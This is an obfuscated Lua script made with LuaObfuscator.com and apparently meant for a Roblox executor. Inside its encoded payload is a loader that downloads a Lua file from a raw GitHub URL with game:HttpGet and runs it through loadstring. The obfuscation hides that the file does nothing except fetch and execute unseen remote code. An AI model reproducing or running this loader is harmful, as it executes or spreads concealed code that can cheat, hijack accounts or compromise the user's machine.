--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v88=v5(v83,v19);v19=nil;return v88;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -(1273 -(226 + 1044)))^(v32-1)))%((1 + (4 -3))^(((v33-(2 -1)) -(v32-(878 -(282 + 595)))) + (1 -0))) ;return v84-(v84%(2 -1)) ;else local v85=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v85 + v85))>=v85) and (569 -(367 + 201))) or ((1182 -(32 + 85)) -(67 + 1 + 997)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * ((1732 -1296) -((1019 -(802 + 150)) + 113))) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;v37=1 + (0 -0) ;end end end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -1)) then v47=v20(v44,16 + 5 ,1028 -(915 + 49 + 33) );v48=((v20(v44,(328 -238) -58 )==((3 -2) + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;v42=6 -3 ;end if (v42==((860 -(814 + 45)) -0)) then v45=1 + (0 -0) ;v46=(v20(v44,1 -0 ,20 + 0 ) * ((793 -(368 + 423))^32)) + v43 ;v42=6 -4 ;end if (v42==(21 -(10 + 8))) then if (v47==(0 -(0 + 0))) then if (v46==(442 -(416 + 26))) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==(2485 -(145 + 293))) then return ((v46==0) and (v48 * ((431 -(44 + 386))/(1486 -(998 + 173 + 315))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + (1583 -(261 + 624))) ) * (v45 + (v46/((2 + 0)^((1463 -639) -((1281 -(1020 + 60)) + 571))))) ;end if (v42==((2561 -(630 + 793)) -((392 -276) + (4838 -3816)))) then v43=v23();v44=v23();v42=4 -3 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 1665 -(970 + 695) ;end)();while true do if (v68==(0 -0)) then if ((1990 -(582 + 1408))~=v52) then else local v95=(function() return 0 + 0 ;end)();local v96=(function() return;end)();while true do if (0==v95) then v96=(function() return 1024 -(706 + 318) ;end)();while true do if ((0 -0)~=v96) then else v53=(function() return function(v141,v142,v143) local v144=(function() return 0 -0 ;end)();local v145=(function() return;end)();while true do if (v144~=0) then else v145=(function() return 0 -0 ;end)();while true do if (v145==0) then local v176=(function() return 0 -0 ;end)();while true do if (v176~=(700 -(271 + 429))) then else v141[v142-#"!" ]=(function() return v143();end)();return v141,v142,v143;end end end end break;end end end;end)();v54=(function() return {};end)();v96=(function() return 1;end)();end if ((1 + 0)==v96) then v55=(function() return {};end)();v52=(function() return 1825 -(1195 + 629) ;end)();break;end end break;end end end if ((1 -0)==v52) then local v97=(function() return 241 -(187 + 54) ;end)();local v98=(function() return;end)();while true do if (v97==0) then v98=(function() return 0;end)();while true do if (v98~=(1 + 0)) then else v58=(function() return v23();end)();v52=(function() return 1173 -(418 + 753) ;end)();break;end if ((0 + 0)==v98) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v98=(function() return 1;end)();end end break;end end end v68=(function() return 1 + 0 ;end)();end if (v68~=(1 + 0)) then else if (v52==(1 + 2)) then for v101= #"|",v23() do local v102=(function() return v21();end)();if (v20(v102, #"]", #"<")==(0 -0)) then local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=3) then else if (v20(v106, #"xnx", #"asd")~= #" ") then else v107[ #"http"]=(function() return v59[v107[ #"asd1"]];end)();end v54[v101]=(function() return v107;end)();break;end if (v104==(0 -0)) then local v130=(function() return 1769 -(1749 + 20) ;end)();while true do if ((1 + 0)~=v130) then else v104=(function() return 1 + 0 ;end)();break;end if (v130~=(1636 -(1373 + 263))) then else v105=(function() return v20(v102,1 + 1 , #"xxx");end)();v106=(function() return v20(v102, #"asd1",1006 -(451 + 549) );end)();v130=(function() return 1 + 0 ;end)();end end end if (v104==1) then local v131=(function() return 0 -0 ;end)();while true do if ((2 -1)~=v131) then else v104=(function() return 2 -0 ;end)();break;end if (v131==(1384 -(746 + 638))) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();while true do if (v171==(0 -0)) then v172=(function() return 341 -(218 + 123) ;end)();while true do if (v172==0) then v107[ #"xnx"]=(function() return v22();end)();v107[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v105== #" ") then v107[ #"gha"]=(function() return v23();end)();elseif (v105==(1583 -(1535 + 46))) then v107[ #"nil"]=(function() return v23() -(2^(16 + 0)) ;end)();elseif (v105== #"xnx") then local v181=(function() return 114 -(4 + 110) ;end)();local v182=(function() return;end)();while true do if ((584 -(57 + 527))==v181) then v182=(function() return 1427 -(41 + 1386) ;end)();while true do if (v182==(103 -(17 + 86))) then v107[ #"nil"]=(function() return v23() -((1 + 1)^(11 + 5)) ;end)();v107[ #"0836"]=(function() return v22();end)();break;end end break;end end end v131=(function() return 1 -0 ;end)();end end end if (v104~=(562 -(306 + 254))) then else if (v20(v106, #"[", #"{")== #"{") then v107[1 + 1 ]=(function() return v59[v107[2]];end)();end if (v20(v106,5 -3 ,2)== #",") then v107[ #"nil"]=(function() return v59[v107[ #"-19"]];end)();end v104=(function() return 169 -(122 + 44) ;end)();end end end end for v103= #"~",v23() do v55,v103,v28=(function() return v53(v55,v103,v28);end)();end return v57;end if (v52==(2 -0)) then local v99=(function() return 0;end)();local v100=(function() return;end)();while true do if (v99==0) then v100=(function() return 0;end)();while true do if ((3 -2)==v100) then v57[ #"91("]=(function() return v21();end)();v52=(function() return 5 -2 ;end)();break;end if (v100==(1467 -(899 + 568))) then v59=(function() return {};end)();for v136= #" ",v58 do local v137=(function() return 0 + 0 ;end)();local v138=(function() return;end)();local v139=(function() return;end)();local v140=(function() return;end)();while true do if (v137==(0 -0)) then v138=(function() return 65 -(30 + 35) ;end)();v139=(function() return nil;end)();v137=(function() return 2 -1 ;end)();end if (1~=v137) then else v140=(function() return nil;end)();while true do if ((603 -(268 + 335))~=v138) then else local v174=(function() return 290 -(60 + 230) ;end)();while true do if ((0 + 0)==v174) then v139=(function() return v21();end)();v140=(function() return nil;end)();v174=(function() return 1;end)();end if (v174==1) then v138=(function() return 573 -(426 + 146) ;end)();break;end end end if (v138==(1 + 0)) then if (v139== #"|") then v140=(function() return v21()~=(1456 -(282 + 1174)) ;end)();elseif (v139==(813 -(569 + 242))) then v140=(function() return v24();end)();elseif (v139~= #"xxx") then else v140=(function() return v25();end)();end v59[v136]=(function() return v140;end)();break;end end break;end end end v100=(function() return 2 -1 ;end)();end end break;end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[(3655 -2442) -(323 + 889) ];local v64=v60[2];local v65=v60[(311 -(244 + 60)) -4 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1;local v74= -((1768 -1187) -(361 + 219));local v75={};local v76={...};local v77=v12("#",...) -(1 + 0 + 0) ;local v78={};local v79={};for v86=413 -(15 + 307 + 91) ,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + (983 -((494 -(41 + 435)) + 964)) ];end end local v80=(v77-v71) + (1002 -(938 + 63)) ;local v81;local v82;while true do local v87=0;while true do if (v87==(0 -0)) then v81=v69[v73];v82=v81[1 + 0 ];v87=1 + 0 ;end if ((v87==(851 -(20 + 830))) or (4134<=3926)) then if ((v82<=(3 + 0)) or (164>=2785)) then if (v82<=(127 -((2091 -(1913 + 62)) + 10))) then if (v82>(0 + 0)) then local v108=v81[(467 + 273) -(542 + 196) ];local v109,v110=v72(v79[v108](v13(v79,v108 + (1 -0) ,v81[1 + 2 + 0 ])));v74=(v110 + v108) -(1 + 0) ;local v111=0 + 0 ;for v133=v108,v74 do v111=v111 + (2 -1) ;v79[v133]=v109[v111];end else v79[v81[4 -(5 -3) ]]=v81[1554 -(1126 + 425) ];end elseif ((v82==(407 -((2051 -(565 + 1368)) + 287))) or (525==2109)) then v79[v81[2]]();else local v114=v81[(26 -19) -5 ];local v115=v79[v81[1124 -(118 + 1003) ]];v79[v114 + (2 -1) ]=v115;v79[v114]=v115[v81[4]];end elseif (v82<=(382 -(142 + (1360 -(936 + 189))))) then if (v82==(18 -14)) then local v119=v81[(1662 -(1477 + 184)) + 1 ];v79[v119]=v79[v119](v13(v79,v119 + (978 -(553 + 424)) ,v74));else local v121=(1613 -(1565 + 48)) -0 ;local v122;local v123;local v124;local v125;local v126;while true do if ((33==33) and (1==v121)) then v81=v69[v73];v79[v81[2 + 0 ]]=v62[v81[3 + 0 ]];v73=v73 + 1 + 0 ;v81=v69[v73];v126=v81[1 + 1 ];v125=v79[v81[2 + 1 ]];v121=4 -2 ;end if ((5 -(2 + 1))==v121) then v79[v126 + (2 -1) ]=v125;v79[v126]=v125[v81[2 + (1140 -(782 + 356)) ]];v73=v73 + (1 -0) ;v81=v69[v73];v79[v81[9 -7 ]]=v81[756 -(239 + (781 -(176 + 91))) ];v73=v73 + 1 + 0 ;v121=1332 -(797 + 532) ;end if (v121==3) then v81=v69[v73];v126=v81[2 + 0 ];v123,v124=v72(v79[v126](v13(v79,v126 + 1 + 0 + 0 ,v81[3])));v74=(v124 + v126) -(2 -1) ;v122=0;for v168=v126,v74 do v122=v122 + (1203 -(373 + 829)) ;v79[v168]=v123[v122];end v121=735 -((1239 -763) + 255) ;end if ((3054<=4015) and (v121==5)) then v79[v81[1132 -(369 + 761) ]]();v73=v73 + 1 + 0 ;v81=v69[v73];do return;end break;end if (v121==(0 -(0 -0))) then v122=nil;v123,v124=nil;v125=nil;v126=nil;v79[v81[3 -1 ]]=v62[v81[241 -(64 + 174) ]];v73=v73 + 1 + 0 ;v121=1 -0 ;end if (v121==4) then v73=v73 + (337 -(144 + (1048 -(564 + 292)))) ;v81=v69[v73];v126=v81[218 -(42 + 174) ];v79[v126]=v79[v126](v13(v79,v126 + 1 ,v74));v73=v73 + (1 -0) + 0 ;v81=v69[v73];v121=(1097 -(975 + 117)) + (1875 -(157 + 1718)) ;end end end elseif (v82>(3 + 3)) then do return;end else v79[v81[1506 -(363 + 1141) ]]=v62[v81[(1285 + 298) -(1183 + 397) ]];end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403583Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F456D706F726572322F7061736567796838393061682F726566732F68656164732F6D61696E2F6772666D75647361687437382E6C756100083Q0012053Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
